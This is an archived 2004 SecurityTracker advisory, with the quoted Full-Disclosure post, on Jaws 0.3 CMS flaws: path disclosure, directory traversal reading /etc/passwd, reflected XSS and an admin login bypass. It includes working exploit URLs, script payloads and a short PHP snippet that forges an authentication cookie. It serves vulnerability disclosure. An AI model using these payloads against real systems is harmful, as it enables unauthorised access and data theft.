SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Jaws Vendors:   jaws.com.mx
Jaws Errors Let Remote Users View Files and Gain Administrative Access
SecurityTracker Alert ID:  1010651
SecurityTracker URL:  http://securitytracker.com/id/1010651
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 6 2004
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 0.3
Description:   Several vulnerabilities were reported in Jaws. A remote user can gain administrative access. A remote user can view files on the target system. A remote user can also determine the installation path and conduct cross-site scripting attacks.

Fernando Quintero reported that a remote user can gain administrative access on the target application due to a logic error in the logged_on() function. A remote user can reportedly set a specially crafted cookie value set to the MD5 hash of a null value to gain access via 'admin.php', the report said.

It is also reported that a remote user can traverse the directory to view arbitrary files on the target system with the privileges of the web service. A demonstration exploit URL is provided:

http://127.0.0.1/jaws/index.php?gadget=../../../../../../../../../../etc/passwd%00&path=/etc

It is also reported that a remote user can determine the installation path by invoking the following type of URL with a path value that does not exist on the target server:

http://127.0.0.1/jaws/index.php?gadget=filebrowser&path=/etc

A remote user can also attempt to directly load files in the include directory to cause the system to display the installation path. A demonstration exploit example is provided:

http://127.0.0.1/jaws/include/config.php

It is also reported that the software does not filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Jaws software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

http://127.0.0.1/jaws/index.php?gadget=[a valid gadget]&action=<b>bold letter</b>

http://127.0.0.1/jaws/index.php?gadget=[a valid gadget]&action=<script>alert('Colombia Rulx!!');</script>

Impact:   A remote user can gain administrative access on the application.

A remote user can view files on the target system with the privileges of the web service.

A remote user can determine the installation path.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Jaws software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   The vendor has issued a fix for version 0.3. To fix this issue, the vendor indicates that you should replace your 'index.php' file with this:

http://jaws.com.mx/files/index.php.txt

Vendor URL:  www.jaws.com.mx/ (Links to External Site)
Cause:   Access control error, Authentication error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] Multiples vulnerabilities in JAWS



check this...

/////////////////////////////////////////////////////


////		Vulnerable Program: JAWS
////
////		Version : 0.3	; it's BETA probably ;)
////
//// 		Url: http://www.jaws.com.mx
////
//// 		The Bug: Multiples vulnerabilities
////
//// 		Date: Today, July 5 off 2004
////
//// 		Author: Fernando Quintero (a.k.a nonroot)
////       	 Email: nando@gigax.org


//////////////////////////////////////////////////////


I. Affected software description:

 Jaws is a Framework and Content Management System for building dynamic
web sites.
 It aims to be User Friendly giving ease of use and lots of ways to
customize web sites,
 but at the same time is Developer Frendly, it offers a simple and
powerful framework to hack
 your own modules. Jaws is Free Software under the GPL.


 note: to hack your own modules, to hack your own modules, to hack your
own modules... ;)


II. Bugs


There are some vulnerabilities in the jaws code, it's were fixed quickly
by your main coder.


1) Full path disclosure ...


There are many ways to determine the full path to the web root directory:


a)  http://127.0.0.1/jaws/index.php?gadget=filebrowser&path=/etc

    Specifying a variable path, that does not exist.


b)  function jaws_error($text, $file, $line)
	 {
	     print ("<b style=\"color: #f00;\" JAWS
Error:</b><br/>".$text."<br/><i> ".$text."<br/><i>".$file.",line
".$line);
         exit;
	 }

    The jaws_error() function, it returns the line and the full path to
the name of the file.


c)  http://127.0.0.1/jaws/include/config.php

    Trying to open some file in the include directory.



2) Arbitrary file browsing.


We can acceded to the file's content through the variable gadget.


http://127.0.0.1/jaws/index.php?gadget=../../../../../../../../../../etc/passwd%00&path=/etc


This line show us the passwd file.

The use of the "path" variable is irrelevant, in the code can be seen a
line like:

$path= str_replace ("..","",$path) --> at this way we filter the content
of path, but in the

index.php file the "gadget" variable is not filter.


The "%00" is necessary because the script adds at the end of the name of
"gadget" variable the extencion ".php"



3) XSS (the fashionable word)

Cross site scripting  in the variable action, because it script returns
the content of the variable:


	http://127.0.0.1/jaws/index.php?gadget=[a valid gadget]&action=<b>bold
letter</b>
	http://127.0.0.1/jaws/index.php?gadget=[a valid
gadget]&action=<script>alert('Colombia Rulx!!');</script>


In the index.php the vulnerable code is:

jaws_error ("Invalid operation: You can't display this action
[".$go_gadget->name."::".$go_gadget->action."]",__file__,__line__);


where "$go_gadget->action" content the erroneus action.


4) Validation without a password :)

There exist a way that allow us to get in the control panel with
administrator rights without a password.

The admin.php file have:


//

if ($GLOBALS["app"]->logged_on())
{
control panel code...
...
}

//

The logged_on() function is in the application.php file.

The function's code.

//

function logged_on()
    {
	return (md5($_SESSION["logged"]) ==$_COOKIE["logged"]);
    }

//


Is extrange to see this type of validation but there is!.

The $_SESSION["logged"] variable before entering the Control Panel it has
a Null ("") value.

a possible way to exploit it should be:

//BEGIN

//exploit.php
<?PHP
setcookie("logged","d41d8cd98f00b204e9800998ecf8427e",time()+86400*365,'path
to jaws');
?>

//END


Where "d41d8cd98f00b204e9800998ecf8427e" is the MD5 hash for the NULL value

This way we can create a cookie ( that look like from the remote system)
and then try the Url:

http://127.0.0.1/jaws/admin.php

and we will be inside.



III. Solution
    The main coder was contacted and the code was fixed in the cvs ;).


IV.  Greetings

    - Greets to GIGAX people.
    - Greets All the community. I learn of you!

V.  Contact

    Fernando Quintero
    nando@gigax.org

VI. Final words

    - Sorry by the english  and  !!! Viva Colombia !!!!!!!!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC